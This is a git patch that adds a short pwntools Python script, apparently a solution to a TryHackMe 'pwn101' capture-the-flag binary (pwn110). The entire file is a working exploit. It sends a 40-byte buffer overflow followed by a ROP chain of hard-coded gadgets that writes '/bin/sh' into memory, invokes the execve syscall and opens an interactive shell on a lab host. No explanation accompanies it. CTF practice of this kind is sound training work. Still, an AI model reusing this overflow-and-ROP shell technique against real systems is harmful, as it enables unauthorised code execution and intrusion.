From 4f91b8d5f8f5b9e72a5802055c0e5e455878dc51 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Tue, 29 Oct 2024 20:31:07 +0300
Subject: [PATCH] solve script

---
 thm_pwn101/pwn110/a.py | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 thm_pwn101/pwn110/a.py

diff --git a/thm_pwn101/pwn110/a.py b/thm_pwn101/pwn110/a.py
new file mode 100644
index 0000000..973c3e1
--- /dev/null
+++ b/thm_pwn101/pwn110/a.py
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn110", checksec=False)
+# r = process()
+r = remote("10.10.42.182", 9010)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+mov_q_ptr_rsi_rdi = 0x44629f
+syscall = 0x4173d4
+pop_rdi = 0x40191a
+pop_rsi = 0x40f4de
+pop_rax = 0x4497d7
+pop_rdx = 0x40181f
+
+# buf
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(0x4c3500)
+buf += p64(pop_rsi)
+buf += b"/bin/sh\0"
+buf += p64(mov_q_ptr_rsi_rdi)
+buf += p64(pop_rax)
+buf += p64(59)
+buf += p64(pop_rsi)
+buf += p64(0)
+buf += p64(pop_rdx)
+buf += p64(0)
+buf += p64(syscall)
+s(buf)
+
+r.interactive()
\ No newline at end of file